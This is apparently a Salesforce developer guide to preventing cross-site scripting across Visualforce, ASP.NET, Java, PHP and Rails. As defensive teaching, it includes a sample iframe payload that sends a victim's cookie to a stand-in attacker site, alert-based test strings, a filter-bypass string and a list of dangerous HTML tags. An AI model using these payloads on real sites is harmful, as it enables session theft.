Contents

Cross-Site Scripting (XSS)


What is it?

Cross-site scripting is a vulnerability that occurs when an attacker can insert unauthorized JavaScript, VBScript, HTML, or other active content into a web page viewed by other users. A malicious script inserted into a page in this manner can hijack the user’s session, submit unauthorized transactions as the user, steal confidential information, or simply deface the page. Cross-site scripting is one of the most serious and most common attacks against web applications today.

XSS allows malicious users to control the content and code on your site — something only you should be able to do!

Sample vulnerability

Consider a web application with a search feature. The user sends their query as a GET parameter, and the page displays the parameter in the page:

Request: http://example.com/search?q=apples

Response: “You searched for: apples

An XSS attack could take place if the user were visiting another site that included the following code:

<iframe
src="http://example.com/search?q=<script>document.location='http://cybervillians.com/?session='+document.cookie</script>">

The user’s browser will load the iframe by requesting http://example.com/search?q=<script>.... In response, example.com will echo back You searched for “<script>document.location='http://cybervillians.com/?session='+document.cookie</script>”. Unfortunately, the victim’s browser will interpret the script as code, not as text, and then execute the script in the context of the user’s session with example.com! It will be as if example.com developers had written their page that way.

In this case, the attack payload sends the value of document.cookie (that is, the user’s example.com cookie) to the attacker’s web site (cybervillains.com). However, there is essentially no limit to the payloads the attacker could have provided. Anything example.com developers can do with HTML and JavaScript, the attacker can also do.

Is my application vulnerable?

Cross-site scripting is one of the most common security vulnerabilities in web sites. Estimates of the percentage of web sites vulnerable to XSS range from 50% to as high as 80%. Most applications that do not have an explicit and uniformly applied set of input validators and output encoders designed to prevent XSS will have vulnerabilities.

How can I test my application?

You can perform a few simple tests to see if your application is vulnerable, but do not get overconfident if you do not discover a vulnerability immediately. Any XSS vulnerability anywhere on your web site can completely compromise the security of your users. Salesforce.com highly recommends using a web application security scanning tool to perform comprehensive testing for XSS across your entire web site.

Burp Suite Professional provides good capabilities, including XSS scanning, at a reasonable price. Information on using the Burp Scanner feature of the suite to test for XSS is available in the help file at http://portswigger.net/scanner/help.html.

The most basic test payload for XSS is a simple script that displays a browser pop-up if the site is vulnerable. Try submitting the string <script>alert('XSS');</script> for any form input that is later displayed by the application. If you don’t see the popup, look at the source for the page where the input is displayed. Are the angle-brackets encoded (&lt; and &gt;)? Is the script simply not in the correct context in the page to execute?

Unfortunately, testing for XSS is not a simple proposition, even with an automated scanner. Some browsers may defend you from simple XSS attacks, leading you to believe the site is safe — but users with other browsers will be vulnerable. (And it is impossible for the browser to correctly stop all XSS attacks.) XSS can happen in many places and contexts. The inputs that create XSS in a tag content context will be different from those that work in an attribute, event handler, or script context. Different browsers interpret malformed HTML differently, and tricks of encoding and obfuscation may be used to bypass a variety of filters. The XSS Cheat Sheet hosted at ha.ckers.org demonstrates dozens of variants on XSS attacks.

XSS also comes in two variants: reflected XSS, demonstrated above, and persistent or stored XSS. Stored XSS happens when data enters an application in one location and the attack payload is stored and displayed by the system somewhere else. This might happen in a bulletin board application, or web-based news or email archives. Any application that stores user input and later displays it to other users can potentially be vulnerable to stored XSS attacks.

It should be apparent that testing even a small web application on the most popular browsers can require many thousands of test cases. XSS is an example of why an application cannot be tested into being secure — it must be engineered to be secure. Strong input filtering and output encoding, universally applied and verified through careful code review, is the best solution for preventing XSS.

For more information on this attack in general, see the following articles:


How do I protect my application?



Apex and Visualforce Applications

The Force.com platform provides several anti-XSS defenses. For example, we have implemented filters that screen out harmful characters in most output methods. For the developer using standard classes and output methods, the threats of XSS flaws have been largely mitigated.

However, the creative developer can still find ways to intentionally or accidentally bypass the default controls. The following sections explain where protection does and does not exist.

Existing Protection

All standard Visualforce components (tags of the form <apex:...>) have anti-XSS filters in place. For example, the following code would normally be vulnerable to an XSS attack because it takes user-supplied input and outputs it directly back to the user. But the <apex:outputText> tag is XSS-safe. All characters that appear to be HTML tags will be converted to their literal form. For example, the < character will be converted to &lt; so that a literal < will display on the user’s screen.

<apex:outputText>
{!$CurrentPage.parameters.userInput}
</apex:outputText>

Disabling escape on Visualforce tags

By default, nearly all Visualforce tags escape the XSS-vulnerable characters. It is possible to disable this behavior by setting the optional attribute escape="false". For example, the following code would be vulnerable to XSS attacks:

<apex:outputText escape="false"
value="{!$CurrentPage.parameters.userInput}" />

Programming Constructs That Are Not Protected From XSS

The following mechanisms do not have built-in XSS protections and you should take extra care when using these tags and objects. The reason is simply because these items were intended to allow the developer to customize the page by inserting script commands. It would not make sense to include anti-XSS filters on commands that are intentionally added to a page.

S-Controls and Custom JavaScript

If you write your own JavaScript or S-controls, the Force.com platform has no way to protect you. For example, the following code is vulnerable to XSS if used in JavaScript:

<script>
var foo = location.search;
document.write(foo);
</script>

<apex:includeScript>

The <apex:includeScript> Visualforce component allows you to include a custom script on the page. In these cases be very careful to validate that the content is sanitized and does not include user-supplied data. For example, the following snippet is extremely vulnerable as it is including user-supplied input as the value of the script text. The value provided by the tag is a URL to the JavaScript to include. If an attacker can supply arbitrary data to this parameter (as in the example below), they can potentially direct the victim to include any JavaScript file from any other web site.

<apex:includeScript value="{!$CurrentPage.parameters.userInput}" />

S-Control Template and Formula Tags

S-Controls give the developer direct access to the HTML page itself and includes an array of tags that can be used to insert data into the pages. As described above, S-Controls do not use any built-in XSS protections. When using the template and formula tags, all output is unfiltered and must be validated by the developer.

The general syntax of these tags is: {!FUNCTION()} or {!$OBJECT.ATTRIBUTE}.

For example, if a developer wanted to include a user’s session ID and in a link, they could create the link using the following syntax:

<a
href=”http://example.com/integration/?sid={!$Api.Session_ID}&server={!$Api.Partner_Server_URL_130}”>Go
to portal</a>

Which would render output similar to

<a
href="http://partner.domain.com/integration/?sid=4f0900D30000000Jsbi%21AQoAQNYaPnVyd_6hNdIxXhzQTMaaSlYiOfRzpM18huTGN3jC0O1FIkbuQRwPc9OQJeMRm4h2UYXRnmZ5wZufIrvd9DtC_ilA&server=https://na1.salesforce.com/services/Soap/u/13.0/4f0900D30000000Jsbi">Go
to portal</a>

Formula expressions can be function calls or include information about platform objects, a user’s environment, system environment, and the request environment. An important feature of these expressions is that data is not escaped during rendering. Since expressions are rendered on the server, it is not possible to escape rendered data on the client using JavaScript or other client-side technology. This can lead to potentially dangerous situations if the formula expression references non-system data (i.e. potentially hostile or editable) and the expression itself is not wrapped in a function to escape the output during rendering. A common vulnerability is created by the use of the {!$Request.*} expression to access request parameters:

<html><head><title>{!$Request.title}</title></head><body>Hello
world!</body></html>

This will cause the server to pull the title parameter from the request and embed it into the page. So, the request

http://example.com/demo/hello.html?title=Hola

would produce the rendered output

<html><head><title>Hola</title></head><body>Hello
world!</body></html>

Unfortunately, the unescaped {!$Request.title} tag also results in a cross-site scripting vulnerability. For example, the request

http://example.com/demo/hello.html?title=Adios%3C%2Ftitle%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E

results in the output

<html><head><title>Adios</title><script>alert('xss')</script></title></head><body>Hello
world!</body></html>

The standard mechanism to do server-side escaping is through the use of the JSENCODE, HTMLENCODE, JSINHTMLENCODE, and URLENCODE functions or the traditional SUBSTITUTE formula tag. Given the placement of the {!$Request.*} expression in the example, the above attack could be prevented by using the following nested HTMLENCODE calls:

<html>
<head>
<title>
{!HTMLENCODE($Request.title)}
</title>
</head>
<body>Hello world!</body>
</html>

Depending on the placement of the tag and usage of the data, both the characters needing escaping as well as their escaped counterparts may vary. For instance, this statement:

 <script>var ret = "{!$Request.retURL}";</script>

would require that the double quote character be escaped with its URL encoded equivalent of %22 instead of the HTML escaped ", since it’s likely going to be used in a link. Otherwise, the request

http://example.com/demo/redirect.html?retURL=foo%22%3Balert('xss')%3B%2F%2F

would result in

<script>var ret = "foo";alert('xss');//”;</script>

Additionally, the ret variable may need additional client-side escaping later in the page if it is used in a way which may cause included HTML control characters to be interpreted. Examples of correct usage are below:

<script>
     // Encode for URL
     var ret = "{!URLENCODE($Request.retURL)}";
     window.location.href = ret;
</script>


<script>
     // Encode for JS variable that is later used in HTML operation
     var title = "{!JSINHTMLENCODE($Request.title)}";
     document.getElementById('titleHeader').innerHTML = title;
</script


<script>
     // Standard JSENCODE to embed in JS variable not later used in HTML
     var pageNum = {!JSENCODE($Request.PageNumber)};
</script>


Formula tags can also be used to include platform object data. Although the data is taken directly from the user’s org, it must still be escaped before use to prevent users from executing code in the context of other users (potentially those with higher privilege levels.) While these types of attacks would need to be performed by users within the same organization, they would undermine the organization’s user roles and reduce the integrity of auditing records. Additionally, many organizations contain data which has been imported from external sources, which may not have been screened for malicious content.


General Guidance

Protecting your application from XSS risks requires a two-layered strategy: input filtering and output filtering and encoding.

The goal of input filtering is to constrain inputs to their expected format and to render any dangerous input harmless by removing dangerous characters. It is always safer to constrain inputs to known-good values than to try to filter dangerous characters. A filter that removes the characters <, >, and " in a user nickname field may prevent XSS attacks when the content is inserted into a page in the context of an HTML element, but what if the input is used in the context of a <script> block, such as the script used to calculate site analytics? In that case, an exploit may not need to use those characters, and filtering on characters like parentheses, periods and semicolons may be necessary. A simple regular expression that only allowed alphabetic characters would prevent both attacks and greatly reduces the likelihood of missing characters that are dangerous in other contexts.

Remember that all user input must be filtered. GET and POST form parameters are not the only place that malicious data may originate. No part of an HTTP request can be trusted. XSS payloads might originate in a user’s cookie or other headers like Referer. Treat all input as suspicious.

Output encoding is the second, and arguably more important, defense. Output encoding refers to rewriting data such that it cannot “break out” of the structural context into which it is inserted. For most scenarios, HTML encoding will be the most appropriate; that is, encoding the characters <, > and " into their HTML entity equivalents: &lt;, &gt;, and &quot;. Nearly all web frameworks will have utility classes or methods for performing this encoding, and using a page templating or a DOM-aware framework that automatically encodes all output, by default, is one of the best defenses against XSS.

Note that ' is the XML entity for the apostrophe and is not a valid HTML entity! In an HTML context you will need to use the Unicode escape sequence '.

Inserting text into a JavaScript context is more difficult and should only be done inside of a variable context that will be used strictly as data. JavaScript uses a backslash encoding similar to C and C++. Be cautious when inserting data into a script variable: escape single and double quotes (and the backslash character itself) to prevent injection. Prefer the Unicode encoding format, \udddd (4 hex digits: dddd), to prevent any browser parsing problems.

Cascading style sheets (CSS) are also a potential location for XSS attacks and so should be encoded carefully or user-specified style attributes disallowed.

Output filtering is similar to input filtering, and should be applied in contexts when output encoding may not be adequate. User data inserted directly into a <script> context, for example, cannot be encoded in a way which makes it safe. The only solution in such a situation is to constrain the data to ensure they do not contain any dangerous characters such as parentheses, periods, and single or double quotes.

Why is output encoding and filtering important if we have already performed input filtering? Many applications do not exclusively display input taken from web forms. Dangerous data might have been imported from a database or spreadsheet, originate from an email message or some other source where input filtering has not been applied. In some cases, data that meet the requirements of an input filter may nevertheless be unsafe when used in a particular output context.

If your application allows users to include HTML tags by design, you must exercise great caution in what tags are allowed. The following tags may allow injection of script code and should not be allowed:

  • <applet>
  • <body>
  • <embed>
  • <frame>
  • <script>
  • <frameset>
  • <html>
  • <iframe>
  • <img>
  • <style>
  • <layer>
  • <link>
  • <ilayer>
  • <meta>
  • <object>

Be aware that the above list cannot be exhaustive. Similarly, there is no complete list of JavaScript event handler names (although see this page on Quirksmode), so there can be no perfect list of bad HTML element attribute names.

Instead, it makes more sense to create a well-defined known-good subset of HTML elements and attributes. Using your programming language’s HTML or XML parsing library, create an HTML input handling routine that throws away all HTML elements and attributes not on the known-good list. This way, you can still allow a wide range of text formatting options without taking on unnecessary XSS risk. Creating such an input validator is usually around 100 lines of code in a language like Python or PHP; it might be more in Java but is still very tractable.

Output filtering and encoding for URLs including user data requires some special considerations. If you return user-controlled data as part of a URL, URL encode that data. (URL encoding translates space to ‘+’ and uses %xx hex encoding for unsafe or non-ASCII-printable characters.) If you allow users to specify an entire URL to link to arbitrary content, ensure that the scheme of the URL is constrained to valid types (e.g. http:, https:, mailto: and possibly ftp:). Allowing users to specify other URL schemes may lead to XSS, such as with the javascript: and data: schemes.

When possible, set the HttpOnly attribute on your cookies. This flag tells the browser to reveal the cookie only over HTTP or HTTPS connections, but to have document.cookie evaluate to a blank string when JavaScript code tries to read it. (Some browsers do still let JavaScript code overwrite or append to document.cookie, however.) If your application does require the ability for JavaScript to read the cookie, then you won’t be able to set HttpOnly. Otherwise, you might as well set this flag.

Note that HttpOnly is not a defense against XSS, it is only a way to briefly slow down attackers exploiting XSS with the simplest possible attack payloads. It is not a bug or vulnerability for the HttpOnly flag to be absent.

Stored XSS Resulting from Arbitrary User Uploaded Content

Applications such as Content Management, Email Marketing, etc. may need to allow legitimate users to create and/or upload custom HTML, Javascript or files. This feature could be misused to launch XSS attacks. For instance, a lower privileged user could attack an administrator by creating a malicious HTML file that steals session cookies. The recommended protection is to serve such arbitrary content from a separate domain outside of the session cookie's scope.

Let’s say cookies are scoped to https://app.site.com. Even if customers can upload arbitrary content, you can always serve the content from an alternate domain that is outside of the scoping of any trusted cookies (session cookies and other sensitive information). As an example, pages on https://app.site.com would reference customer-uploaded HTML templates as IFRAMES using a link to https://content.site.com/cust1/templates?templId=13&auth=someRandomAuthenticationToken

The authentication token would substitute for the session cookie since sessions scoped to app.site.com would not be sent to content.site.com. If the data being stored is sensitive, a one time use or short lived token should be used. This is the method that salesforce.com uses for our content product.

HTTP Response Splitting

HTTP response splitting is a vulnerability closely related to XSS, and for which the same defensive strategies apply. Response splitting occurs when user data is inserted into an HTTP header returned to the client. Instead of inserting malicious script, the attack is to insert additional newline characters. Because headers and the response body are delimited by newlines in HTTP, this allows the attacker to insert their own headers and even construct their own page body (which might have an XSS payload inside). To prevent HTTP response splitting, filter ‘\n’ and ‘\r’ from any output used in an HTTP header.


ASP.NET

ASP.NET provides several built-in mechanisms to help prevent XSS, and Microsoft supplies several free tools for identifiying and preventing XSS in sites built with .NET technology.

An excellent general discussion of preventing XSS in ASP.NET 1.1 and 2.0 can be found at the Microsoft Patterns & Practices site:

By default, ASP.NET enables request validation on all pages, to prevent accepting of input containing unencoded HTML. (For more details see http://www.asp.net/learn/whitepapers/request-validation/.) Verify in your Machine.config and Web.config that you have not disabled request validation. Identify and correct any pages that may have disabled it individually by searching for the ValidateRequest request attribute in the page declaration tag. If this attribute is not present, it defaults to true.

Input Validation

For server controls in ASP.NET, it is simple to add server-side input validation using <asp:RegularExpressionValidator>.

If you are not using server controls, you can use the Regex class in the System.Text.RegularExpressions namespace or use other supporting classes for validation.

For example regular expressions and tips on other validation routines for numbers, dates, and URL strings, see Microsoft Patterns & Practices: “How To: Protect from Injection Attacks in ASP.NET”.

Output Filtering & Encoding

The System.Web.HttpUtility class provides convenient methods, HtmlEncode and UrlEncode for escaping output to pages. These methods are safe, but follow a “blacklist” approach that encodes only a few characters known to be dangerous. Microsoft also makes available the AntiXSS Library that follows a more restrictive approach, encoding all characters not in an extensive, internationalized whitelist. You can get more information and download AntiXSS here:

Tools and Testing

Microsoft provides a free static analysis tool, CAT.NET. CAT.NET is a snap-in to Visual Studio that helps identify XSS as well as several other classes of security flaw. Version 1 of the tool is available as a Community Technical Preview from the Microsoft download site:


Java

J2EE web applications have perhaps the greatest diversity of frameworks available for handling user input and creating pages. Several strong, all-purpose libraries are available, but it is important to understand what your particular platform provides.

Input Filtering

Take advantage of built-in framework tools to validate input as it is being used to generate business or model objects. In Struts, input validation rules can be defined in XML using the Validator Plugin in your struts-config.xml:

<plug-in className="org.apache.struts.validator.ValidatorPlugIn">
    <set-property property="pathnames" value="/WEB-INF/validator-rules.xml"/>
</plug-in>

Or you can build programmatic validation directly into your form beans with regular expressions.

Learn more about Java regular expressions here:

The Spring Framework also provides utilities for building automatic validation into data binding. You can implement the org.springframework.validation.Validator interface with the help of Spring’s ValidationUtils class to protect your business objects. Get more information here:

A more generic approach, applicable to any kind of Java object, is presented by the OVal object validation framework. OVal allows constraints on objects to be declared with annotations, through POJOs or in XML, and expressing custom constraints as Java classes or in a variety of scripting languages. The system is quite powerful, implements Programming by Contract features using AspectJ, and provides some built-in support for frameworks like Spring. Learn more about OVal at:


Output Filtering and Encoding

JSTL tags such as <c:out> have the excapeXml attribute set to true by default, This default behavior ensures that HTML special characters are entity-encoded and prevents many XSS attacks. If any tags in your application set escapeXml="false" (such as for outputting the Japanese yen symbol) you need to apply some other escaping strategy. For JSF, the tag attribute is escape, and is also set to true by default for <h:outputText> and <h:outputFormat>.

Other page generation systems do not always escape output by default. Freemarker is one example. All application data included in a Freemarker template should be surrounded with an <#escape> directive to do output encoding (e.g. <#escape x as x?html>) or by manually adding ?html (or ?js_string for JavaScript contexts) to each expression (e.g. ${username?html}).

Custom JSP tags or direct inclusion of user data variables with JSP expressions (e.g. <%= request.getHeader("HTTP_REFERER") %>) or scriptlets (e.g. <% out.println(request.getHeader("HTTP_REFERER") %>) should be avoided.

If you are using a custom page-generation system, one that does not provide output escaping mechanisms, or building directly with scriptlets, there are several output encoding libraries available. The OWASP Enterprise Security API for Java is a mature project that offers a variety of security services to J2EE applications. The org.owasp.esapi.codecs package provides classes for encoding output springs safely for HTML, JavaScript and several other contexts. Get it here:

Other libraries to consider include the Apache Commons Lang StringEscapeUtils class or the multi-plaform Reform library from the OWASP Encoding Project.


PHP

Input Filtering

As of PHP 5.2.0, data filtering is a part of the PHP Core. The package documentation is available at:

Two types of filters can be declared: sanitization filters that strip or encode certain characters, and validation filters that can apply business logic rules to inputs. The Zend Developer Zone has a good tutorial on how to use the Filter extension, including the legacy package for earlier versions of PHP and demonstrating an example of a more complex validation using a callback:


Output Encoding

PHP provides two built-in string functions for encoding HTML output. htmlspecialchars encodes only &, ", ', <, and >, while htmlentities encodes all HTML characters with defined entities.

For bulletin-board like functionality where HTML content is intended to be included in output, the strip_tags function is also available to return a string with all HTML and PHP tags removed, but because this function is implemented with a regex that does not validate that incoming strings are well-formed HTML, partial or broken tags may be able to bypass the system. For example, the string <<b>script>alert('xss');<</b>/script> might have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>. If you are going to rely on this function, input must be sent to an HTML validating and tidying program first. (Note that in PHP 5.2.6, strip_tags does appear to work, reducing the aforementioned attack string to alert('xss'). Does it work in your version?)

For a more comprehensive approach that combines encoding with an extensive whitelist, the multi-plaform Reform library from the OWASP Encoding Project contains PHP implementations of strong output filters for several contexts.


Ruby on Rails

Input Filtering

Older versions of Ruby on Rails used a vulnerable blacklist approach built on trying to recognize and remove tags. This suffered from vulnerabilities if applied to strings that had broken or partial HTML. For example, the string <<b>script>alert('xss');<</b>/script> would have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>. For this reason, avoid the strip_tags and strip_links methods in favor of the updated Rails 2 method sanitize.

See the Ruby on Rails Security guide for more information:


Output Encoding

Strings written by <%= %> in rhtml templates are not escaped by default. the escapeHtml (or its shorthand, h) can be used to entity encode HTML characters, but you must be careful to do this in every location where user input is used.

For a more comprehensive approach that combines encoding with an extensive whitelist, the multi-plaform Reform library from the OWASP Encoding Project contains Ruby implementations of strong output filters for several contexts.